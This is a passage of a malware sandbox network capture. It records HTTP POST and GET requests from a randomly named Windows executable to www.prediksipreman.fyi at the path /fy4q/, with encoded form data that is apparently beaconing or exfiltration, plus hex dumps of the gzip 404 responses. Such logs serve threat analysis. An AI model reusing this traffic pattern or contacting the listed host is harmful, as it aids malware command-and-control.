                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTYxOTBiM2MtYTAzOC00NjViLThjN2ItMmQzNWRhOGUwZWZhIiwicGFnZV90aW1lIjoxNzMwNzExND


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449870162.0.215.244805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:20.552159071 CET750OUTPOST /fy4q/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.prediksipreman.fyi
                                                        Origin: http://www.prediksipreman.fyi
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.prediksipreman.fyi/fy4q/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 72 65 6a 6f 52 62 68 30 6e 6b 67 61 4e 76 64 53 70 50 6d 79 6a 47 31 41 4c 50 37 30 52 44 74 6c 71 75 52 56 70 78 37 2b 48 2f 7a 32 65 62 65 32 63 6e 7a 31 61 6b 39 56 41 43 71 62 64 67 51 32 32 63 31 31 6d 48 33 63 59 6e 44 46 52 75 72 42 41 45 37 42 49 70 78 65 49 4e 2f 30 6e 31 4a 75 2f 4d 46 47 68 52 59 32 58 4d 6f 34 61 4e 4c 35 37 4c 6d 69 38 59 62 77 35 38 56 79 78 67 2b 49 4d 68 36 47 61 54 4c 50 65 4f 31 42 35 66 55 47 43 2b 46 43 7a 37 43 51 4f 67 5a 76 6d 67 70 4e 6c 6d 30 7a 43 56 39 33 35 2b 2f 48 2f 64 63 6c 6a 55 73 79 36 7a 62 45 6c 6c 69 61 43 69 4c 38 67 77 3d 3d
                                                        Data Ascii: Q8r=rejoRbh0nkgaNvdSpPmyjG1ALP70RDtlquRVpx7+H/z2ebe2cnz1ak9VACqbdgQ22c11mH3cYnDFRurBAE7BIpxeIN/0n1Ju/MFGhRY2XMo4aNL57Lmi8Ybw58Vyxg+IMh6GaTLPeO1B5fUGC+FCz7CQOgZvmgpNlm0zCV935+/H/dcljUsy6zbElliaCiL8gw==
                                                        Nov 4, 2024 10:11:21.224293947 CET1236INHTTP/1.1 404 Not Found
                                                        keep-alive: timeout=5, max=100
                                                        content-type: text/html
                                                        transfer-encoding: chunked
                                                        content-encoding: gzip
                                                        vary: Accept-Encoding
                                                        date: Mon, 04 Nov 2024 09:11:21 GMT
                                                        server: LiteSpeed
                                                        x-turbo-charged-by: LiteSpeed
                                                        connection: close
                                                        Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae fe 81 a4 aa ca ca ca fc 32 b3 3a b3 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f 7f 06 a0 3d 06 ae e9 7c fb ed f2 98 b8 95 09 46 54 f9 bd 7b ac c3 e6 e9 8e c9 d2 ca 4d ab fb ea 94 bb 77 03 fb f9 ed e9 ae 72 bb 0a ee 49 fc 65 60 07 66 51 ba d5 53 5d 79 f7 e4 dd a7 74 4c 3b 70 ef fb f9 45 16 5f 11 4a b3 7b bb ef fa 74 a2 52 98 7e 62 fe 23 33 b8 2e 0f 0b b7 bc 9a 82 bc a3 9e 9a 89 fb 74 d7 84 6e 9b 67 45 75 35 ac 0d 9d 2a 78 72 dc 26 b4 dd fb cb cb 97 41 98 86 55 68 c6 f7 a5 6d c6 ee 13 fa f5 3b a9 2a ac 62 f7 1b 81 10 03 39 ab 06 d3 ac 4e 9d 47 f8 f9 e3 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 56 e6 9c 06 7f bf 0c ed 5f fb e6 01 e9 dc 7b 66 12 c6 a7 87 01 55 80 65 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 4e 2b c3 b3 fb 30 40 89 bc 7b [TRUNCATED]
                                                        Data Ascii: 1359ZJrnhztDo$@B%tEw5d.4}f2:~bPAP%=|FT{MwrIe`fQS]ytL;pE_J{tR~b#3.tngEu5*xr&AUhm;*b9NG(^n/^V_{fUe7n*/L-B/?N+0@{{T+1J`,PQ.>lc8/7'L,0}?_vfry8a&gv&JLdU~Y?}"xW<KK>Lfre.meeVu7/yVAfYfL/5u;_w\Xq]ps:n\UNa}K{-G'ua&H~00}3qCVVUY0xl/+,+I+^kga\[NBf:Aev]~m?Z+5"&7~#EF7--L/>eu+=SwU+g^Wvx8WhC('x#n^@Jbg>wabjO}ejv}m_.z9^GY[#Q@PY(q>gM@F[[@t.8g|D%~
                                                        Nov 4, 2024 10:11:21.224405050 CET1236INData Raw: 9c f1 29 81 12 f8 9b 1a de f8 f9 5b e2 3a a1 39 f8 53 02 1c e9 8b 62 c6 23 32 ef fe 7c b3 cc 2d 6a 6f ba 7b e1 e5 59 79 89 50 0f 83 c2 8d 81 af 6b 6e 0c b0 1f d3 7b 2c 60 3f ed c3 20 08 1d c7 4d df 58 ea 7b fb 76 15 9f 2e c8 7e b6 eb f7 e3 de d8
                                                        Data Ascii: )[:9Sb#2|-jo{YyPkn{,`? MX{v.~ga~'PSy\pC{K;v-}K;c#,{PuBz2}GH}/>7y!#?6x!GiY\Wa3zu
                                                        Nov 4, 2024 10:11:21.224684000 CET424INData Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                        Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                        Nov 4, 2024 10:11:21.224695921 CET1236INData Raw: d5 e1 7e a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b4 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1
                                                        Data Ascii: ~cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$][YZL'939}Zv
                                                        Nov 4, 2024 10:11:21.225094080 CET1098INData Raw: 78 3b ac 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90
                                                        Data Ascii: x;uW$FNcYXp8.Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;7e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdl


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449884162.0.215.244805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:23.093401909 CET770OUTPOST /fy4q/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.prediksipreman.fyi
                                                        Origin: http://www.prediksipreman.fyi
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.prediksipreman.fyi/fy4q/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 72 65 6a 6f 52 62 68 30 6e 6b 67 61 4d 50 74 53 75 73 4f 79 6d 6d 31 42 45 76 37 30 59 6a 74 68 71 75 64 56 70 77 2b 6c 48 4e 48 32 65 36 75 32 64 6d 7a 31 66 6b 39 56 55 53 71 61 43 51 51 4c 32 64 49 47 6d 46 6a 63 59 6e 6e 46 52 72 58 42 41 7a 76 4f 49 35 78 63 45 74 2f 68 6a 31 4a 75 2f 4d 46 47 68 52 4d 63 58 4d 41 34 61 63 37 35 37 71 6d 68 31 34 62 78 75 4d 56 79 67 51 2b 54 4d 68 37 56 61 58 53 67 65 4d 39 42 35 65 6b 47 44 71 5a 44 6d 4c 43 53 54 77 59 2b 69 53 4e 44 6f 6c 38 39 41 44 35 51 37 36 36 71 2b 62 52 2f 79 6c 4e 6c 6f 7a 2f 33 34 69 72 75 50 68 32 31 37 33 31 73 69 67 69 43 57 37 50 79 69 45 67 6c 6b 34 4c 69 49 61 77 3d
                                                        Data Ascii: Q8r=rejoRbh0nkgaMPtSusOymm1BEv70YjthqudVpw+lHNH2e6u2dmz1fk9VUSqaCQQL2dIGmFjcYnnFRrXBAzvOI5xcEt/hj1Ju/MFGhRMcXMA4ac757qmh14bxuMVygQ+TMh7VaXSgeM9B5ekGDqZDmLCSTwY+iSNDol89AD5Q766q+bR/ylNloz/34iruPh21731sigiCW7PyiEglk4LiIaw=
                                                        Nov 4, 2024 10:11:23.749346018 CET1236INHTTP/1.1 404 Not Found
                                                        keep-alive: timeout=5, max=100
                                                        content-type: text/html
                                                        transfer-encoding: chunked
                                                        content-encoding: gzip
                                                        vary: Accept-Encoding
                                                        date: Mon, 04 Nov 2024 09:11:23 GMT
                                                        server: LiteSpeed
                                                        x-turbo-charged-by: LiteSpeed
                                                        connection: close
                                                        Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae fe 81 a4 aa ca ca ca fc 32 b3 3a b3 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f 7f 06 a0 3d 06 ae e9 7c fb ed f2 98 b8 95 09 46 54 f9 bd 7b ac c3 e6 e9 8e c9 d2 ca 4d ab fb ea 94 bb 77 03 fb f9 ed e9 ae 72 bb 0a ee 49 fc 65 60 07 66 51 ba d5 53 5d 79 f7 e4 dd a7 74 4c 3b 70 ef fb f9 45 16 5f 11 4a b3 7b bb ef fa 74 a2 52 98 7e 62 fe 23 33 b8 2e 0f 0b b7 bc 9a 82 bc a3 9e 9a 89 fb 74 d7 84 6e 9b 67 45 75 35 ac 0d 9d 2a 78 72 dc 26 b4 dd fb cb cb 97 41 98 86 55 68 c6 f7 a5 6d c6 ee 13 fa f5 3b a9 2a ac 62 f7 1b 81 10 03 39 ab 06 d3 ac 4e 9d 47 f8 f9 e3 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 56 e6 9c 06 7f bf 0c ed 5f fb e6 01 e9 dc 7b 66 12 c6 a7 87 01 55 80 65 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 4e 2b c3 b3 fb 30 40 89 bc 7b [TRUNCATED]
                                                        Data Ascii: 1359ZJrnhztDo$@B%tEw5d.4}f2:~bPAP%=|FT{MwrIe`fQS]ytL;pE_J{tR~b#3.tngEu5*xr&AUhm;*b9NG(^n/^V_{fUe7n*/L-B/?N+0@{{T+1J`,PQ.>lc8/7'L,0}?_vfry8a&gv&JLdU~Y?}"xW<KK>Lfre.meeVu7/yVAfYfL/5u;_w\Xq]ps:n\UNa}K{-G'ua&H~00}3qCVVUY0xl/+,+I+^kga\[NBf:Aev]~m?Z+5"&7~#EF7--L/>eu+=SwU+g^Wvx8WhC('x#n^@Jbg>wabjO}ejv}m_.z9^GY[#Q@PY(q>gM@F[[@t.8g|D%~
                                                        Nov 4, 2024 10:11:23.749455929 CET212INData Raw: 9c f1 29 81 12 f8 9b 1a de f8 f9 5b e2 3a a1 39 f8 53 02 1c e9 8b 62 c6 23 32 ef fe 7c b3 cc 2d 6a 6f ba 7b e1 e5 59 79 89 50 0f 83 c2 8d 81 af 6b 6e 0c b0 1f d3 7b 2c 60 3f ed c3 20 08 1d c7 4d df 58 ea 7b fb 76 15 9f 2e c8 7e b6 eb f7 e3 de d8
                                                        Data Ascii: )[:9Sb#2|-jo{YyPkn{,`? MX{v.~ga~'PSy\pC{K;v-}K;c#,{PuBz2}GH}/>7y!#?6x!
                                                        Nov 4, 2024 10:11:23.749468088 CET1236INData Raw: fb c7 1a ee 47 bc 19 97 69 95 59 5c 57 1f 18 d7 cb 61 fc ca 7f f4 33 fb f6 7a bc f9 a0 eb 75 4b c8 cd 39 bd 9f 76 23 9c 97 03 f7 b3 f6 3f 00 d0 4d bc fe 4c f1 6f 54 3f 70 3e 93 09 10 ed ff c2 f9 fc e8 36 ea 22 fe 93 63 56 e6 c3 c5 8d c0 79 ea ff
                                                        Data Ascii: GiY\Wa3zuK9v#?MLoT?p>6"cVy2KwD|7Rk9ghJ8OJJLR4?CYVvjCmQK!K4.fx:2ux1z2;|gYfuL>Ca!;@IMu.>%
                                                        Nov 4, 2024 10:11:23.749836922 CET1236INData Raw: cc 09 8d 73 68 79 29 53 13 79 b9 35 b8 b6 3e 0e 09 2a 50 dc 0e 97 4d 51 5d b4 82 28 aa b1 1a 29 56 5b 6a d3 dc 49 1c 0b 0e 58 72 bd 62 99 76 4d d7 e4 16 47 ca 95 18 ae c6 00 31 ed 7e cc f8 94 cb 1e 62 53 9a 44 15 c5 22 90 d4 b5 20 39 4d ee ca b5
                                                        Data Ascii: shy)Sy5>*PMQ]()V[jIXrbvMG1~bSD" 9M)e1>qZB0t-Zm>Tj3V=3+L`&&WS"8ea#{Y:v\Hi\Kv^$r Rp;~cf)Z@Yc!jZGf
                                                        Nov 4, 2024 10:11:23.749850988 CET1236INData Raw: 34 05 3c 08 7a 5d 8e cb 64 13 90 a2 b0 e1 c5 76 56 2d 4e e3 5a 1e 29 2e dc 52 69 41 77 cb 94 32 4f e2 6a b1 8d 54 b2 cd e8 f9 49 83 20 47 5f 97 35 37 87 16 64 8e d1 2c e1 f1 4e e9 1d 83 8e 57 d7 ea 3e ae 05 7d b1 2b b4 12 1c ae 68 0e 59 fa 67 31
                                                        Data Ascii: 4<z]dvV-NZ).RiAw2OjTI G_57d,NW>}+hYg1.LlvtLwI*(<k<$b{JlxM=0 .cH)v Hv\d)Nkt56!]i,NKJ!"jMVx;uW$FNcYXp8.Y
                                                        Nov 4, 2024 10:11:23.749861956 CET74INData Raw: d4 3f 43 e6 7b 99 bd 14 15 ef be 31 df eb 8b ff fd 5f a0 02 84 8e 06 d7 d4 3e 50 d9 b3 da cc 1b 85 bc c7 d7 23 7c ad b5 47 f8 39 7e 3d 5e ae c9 7d fb ed 7f 00 00 00 ff ff 03 00 76 8b 63 38 84 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: ?C{1_>P#|G9~=^}vc8'0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449900162.0.215.244805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:25.646097898 CET10852OUTPOST /fy4q/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.prediksipreman.fyi
                                                        Origin: http://www.prediksipreman.fyi
                                                        Content-Length: 10300
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.prediksipreman.fyi/fy4q/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 72 65 6a 6f 52 62 68 30 6e 6b 67 61 4d 50 74 53 75 73 4f 79 6d 6d 31 42 45 76 37 30 59 6a 74 68 71 75 64 56 70 77 2b 6c 48 4e 2f 32 65 49 57 32 64 46 72 31 59 6b 39 56 4c 69 71 66 43 51 51 73 32 64 52 75 6d 46 2f 69 59 68 6a 46 52 4a 50 42 49 69 76 4f 44 35 78 63 4d 4e 2b 47 6e 31 4a 2f 2f 4d 31 43 68 52 63 63 58 4d 41 34 61 65 6a 35 79 62 6d 68 35 59 62 77 35 38 56 2b 78 67 2f 64 4d 68 69 67 61 58 65 4b 66 2f 6c 42 35 2b 30 47 42 5a 78 44 6b 72 43 55 51 77 59 6d 69 53 77 42 6f 6d 4a 43 41 44 6c 71 37 39 79 71 2f 66 4e 38 6f 52 56 50 79 79 76 55 74 56 50 31 47 44 2b 48 31 41 78 47 7a 51 69 4c 42 6f 71 46 70 44 4a 77 2b 72 66 47 61 36 4a 74 71 66 78 6a 2f 6a 65 32 53 6b 68 4d 76 47 44 55 30 2b 78 4d 74 71 45 56 50 75 2b 76 4c 71 56 4b 4b 71 4e 75 70 79 36 52 78 54 38 57 67 6c 4a 4d 4b 2b 7a 61 72 4a 37 4d 47 33 66 4e 4e 37 51 32 77 31 72 44 4f 38 4b 42 37 7a 48 4f 76 31 39 72 32 6c 4f 30 6d 37 4a 52 58 54 6c 74 36 70 32 52 37 72 34 41 68 46 35 47 65 51 2b 57 50 4d 6f 4b 50 33 6e 39 4c 50 [TRUNCATED]
                                                        Data Ascii: Q8r=rejoRbh0nkgaMPtSusOymm1BEv70YjthqudVpw+lHN/2eIW2dFr1Yk9VLiqfCQQs2dRumF/iYhjFRJPBIivOD5xcMN+Gn1J//M1ChRccXMA4aej5ybmh5Ybw58V+xg/dMhigaXeKf/lB5+0GBZxDkrCUQwYmiSwBomJCADlq79yq/fN8oRVPyyvUtVP1GD+H1AxGzQiLBoqFpDJw+rfGa6Jtqfxj/je2SkhMvGDU0+xMtqEVPu+vLqVKKqNupy6RxT8WglJMK+zarJ7MG3fNN7Q2w1rDO8KB7zHOv19r2lO0m7JRXTlt6p2R7r4AhF5GeQ+WPMoKP3n9LP5LP4Mv0CPH8Tu5dqpJN9PYgC1+THYU2eGayLJtBi5K6YxFW9fILSdo9WKJA9QdNYp5TtC3fwCaZ0Hvo2tCB7FMfYXa/B/BVB4uOFYpak8sFx6omk2QjPIfvv6x82EgWCOVUpG5im0ZmKligFG0JER9W/DX+idiYhprk55YG7oH2lp57fayqknm+F9Sir6QNjF0MTcYoWOWX6puJhdO8QD92I0dJLIxFlTeSA9DFkdM4GZDv3h3nwIgTBFWLk3R8K3FinddgTmXfBrAJwiAZzgnXAzKN9Iufy7cwPYRT+qLpJQBfuVHK47Z8CA7jjNyKbtBmX/LKvmP3a/Tz2V4dKru3QaEXqr3hw0/5UBkj/d7FUCVWDJmF+1OTtqM39pSULqQ4L91hTtu/UA/qa0glzO91wmyrrdsn4b/ffxy+6ttxLiGxGMpt/Vjovx32gSCEGXr7q9CQEzkc0y2fQ3v1V1d7E4xAC/ndT2gAWjZJwTD0KEMEBO5nez/6pZkBEXq6jJc0pDgl03Ry5EMokTJeVpV86hfERdZL4BZOoI7HIq1ZnSOqRgQXbsFxvXELO/QuUdgto6FWXPAgIM/Q/Z/4mSKybHo+2xPWX71iZ1SKtbbQDywvY7HhTlY/sXjFbY8FQYkGfXMkFUC30vQp46Ww99qpjdj/yQfgrZU [TRUNCATED]
                                                        Nov 4, 2024 10:11:26.346781969 CET1236INHTTP/1.1 404 Not Found
                                                        keep-alive: timeout=5, max=100
                                                        content-type: text/html
                                                        transfer-encoding: chunked
                                                        content-encoding: gzip
                                                        vary: Accept-Encoding
                                                        date: Mon, 04 Nov 2024 09:11:26 GMT
                                                        server: LiteSpeed
                                                        x-turbo-charged-by: LiteSpeed
                                                        connection: close
                                                        Data Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae fe 81 a4 aa ca ca ca fc 32 b3 3a b3 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f 7f 06 a0 3d 06 ae e9 7c fb ed f2 98 b8 95 09 46 54 f9 bd 7b ac c3 e6 e9 8e c9 d2 ca 4d ab fb ea 94 bb 77 03 fb f9 ed e9 ae 72 bb 0a ee 49 fc 65 60 07 66 51 ba d5 53 5d 79 f7 e4 dd a7 74 4c 3b 70 ef fb f9 45 16 5f 11 4a b3 7b bb ef fa 74 a2 52 98 7e 62 fe 23 33 b8 2e 0f 0b b7 bc 9a 82 bc a3 9e 9a 89 fb 74 d7 84 6e 9b 67 45 75 35 ac 0d 9d 2a 78 72 dc 26 b4 dd fb cb cb 97 41 98 86 55 68 c6 f7 a5 6d c6 ee 13 fa f5 3b a9 2a ac 62 f7 1b 81 10 03 39 ab 06 d3 ac 4e 9d 47 f8 f9 e3 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 56 e6 9c 06 7f bf 0c ed 5f fb e6 01 e9 dc 7b 66 12 c6 a7 87 01 55 80 65 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 4e 2b c3 b3 fb 30 40 89 bc 7b [TRUNCATED]
                                                        Data Ascii: 134FZJrnhztDo$@B%tEw5d.4}f2:~bPAP%=|FT{MwrIe`fQS]ytL;pE_J{tR~b#3.tngEu5*xr&AUhm;*b9NG(^n/^V_{fUe7n*/L-B/?N+0@{{T+1J`,PQ.>lc8/7'L,0}?_vfry8a&gv&JLdU~Y?}"xW<KK>Lfre.meeVu7/yVAfYfL/5u;_w\Xq]ps:n\UNa}K{-G'ua&H~00}3qCVVUY0xl/+,+I+^kga\[NBf:Aev]~m?Z+5"&7~#EF7--L/>eu+=SwU+g^Wvx8WhC('x#n^@Jbg>wabjO}ejv}m_.z9^GY[#Q@PY(q>gM@F[[@t.8g|D%~
                                                        Nov 4, 2024 10:11:26.346915960 CET212INData Raw: 9c f1 29 81 12 f8 9b 1a de f8 f9 5b e2 3a a1 39 f8 53 02 1c e9 8b 62 c6 23 32 ef fe 7c b3 cc 2d 6a 6f ba 7b e1 e5 59 79 89 50 0f 83 c2 8d 81 af 6b 6e 0c b0 1f d3 7b 2c 60 3f ed c3 20 08 1d c7 4d df 58 ea 7b fb 76 15 9f 2e c8 7e b6 eb f7 e3 de d8
                                                        Data Ascii: )[:9Sb#2|-jo{YyPkn{,`? MX{v.~ga~'PSy\pC{K;v-}K;c#,{PuBz2}GH}/>7y!#?6x!
                                                        Nov 4, 2024 10:11:26.346925974 CET1236INData Raw: fb c7 1a ee 47 bc 19 97 69 95 59 5c 57 1f 18 d7 cb 61 fc ca 7f f4 33 fb f6 7a bc f9 a0 eb 75 4b c8 cd 39 bd 9f 76 23 9c 97 03 f7 b3 f6 3f 00 d0 4d bc fe 4c f1 6f 54 3f 70 3e 93 09 10 ed ff c2 f9 fc e8 36 ea 22 fe 93 63 56 e6 c3 c5 8d c0 79 ea ff
                                                        Data Ascii: GiY\Wa3zuK9v#?MLoT?p>6"cVy2KwD|7Rk9ghJ8OJJLR4?CYVvjCmQK!K4.fx:2ux1z2;|gYfuL>Ca!;@IMu.>%
                                                        Nov 4, 2024 10:11:26.347342968 CET1236INData Raw: cc 09 8d 73 68 79 29 53 13 79 b9 35 b8 b6 3e 0e 09 2a 50 dc 0e 97 4d 51 5d b4 82 28 aa b1 1a 29 56 5b 6a d3 dc 49 1c 0b 0e 58 72 bd 62 99 76 4d d7 e4 16 47 ca 95 18 ae c6 00 31 ed 7e cc f8 94 cb 1e 62 53 9a 44 15 c5 22 90 d4 b5 20 39 4d ee ca b5
                                                        Data Ascii: shy)Sy5>*PMQ]()V[jIXrbvMG1~bSD" 9M)e1>qZB0t-Zm>Tj3V=3+L`&&WS"8ea#{Y:v\Hi\Kv^$r Rp;~cf)Z@Yc!jZGf
                                                        Nov 4, 2024 10:11:26.347354889 CET1236INData Raw: 34 05 3c 08 7a 5d 8e cb 64 13 90 a2 b0 e1 c5 76 56 2d 4e e3 5a 1e 29 2e dc 52 69 41 77 cb 94 32 4f e2 6a b1 8d 54 b2 cd e8 f9 49 83 20 47 5f 97 35 37 87 16 64 8e d1 2c e1 f1 4e e9 1d 83 8e 57 d7 ea 3e ae 05 7d b1 2b b4 12 1c ae 68 0e 59 fa 67 31
                                                        Data Ascii: 4<z]dvV-NZ).RiAw2OjTI G_57d,NW>}+hYg1.LlvtLwI*(<k<$b{JlxM=0 .cH)v Hv\d)Nkt56!]i,NKJ!"jMVx;uW$FNcYXp8.Y
                                                        Nov 4, 2024 10:11:26.347364902 CET79INData Raw: a9 7f 86 cc f7 32 7b 29 2a de 7d 63 be d7 17 ff fb bf 40 05 08 1d 0d ae a9 7d a0 b2 67 b5 99 37 0a 79 8f af 47 f8 5a 6b 8f f0 73 fc 7a bc 5c 93 fb f6 db ff 00 00 00 ff ff 0d 0a 41 0d 0a 03 00 40 df 63 f8 84 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 2{)*}c@}g7yGZksz\A@c'0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.449912162.0.215.244805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:28.183389902 CET470OUTGET /fy4q/?Q8r=mcLISvp6nW4sNO0Oj8jOpWhNNbX1eENX6bIi/iiCJdbobbylfQD4XX0OLgusDywc0PIJxHOPAGfsQI2vBEzMGplJEOCqrWIF9aldzRVMXORMZ/L63cm0yJs=&6trpq=anQT3n HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.prediksipreman.fyi
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Nov 4, 2024 10:11:28.863142014 CET1236INHTTP/1.1 404 Not Found
                                                        keep-alive: timeout=5, max=100
                                                        content-type: text/html
                                                        transfer-encoding: chunked
                                                        date: Mon, 04 Nov 2024 09:11:28 GMT
                                                        server: LiteSpeed
                                                        x-turbo-charged-by: LiteSpeed
                                                        connection: close
                                                        Data Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 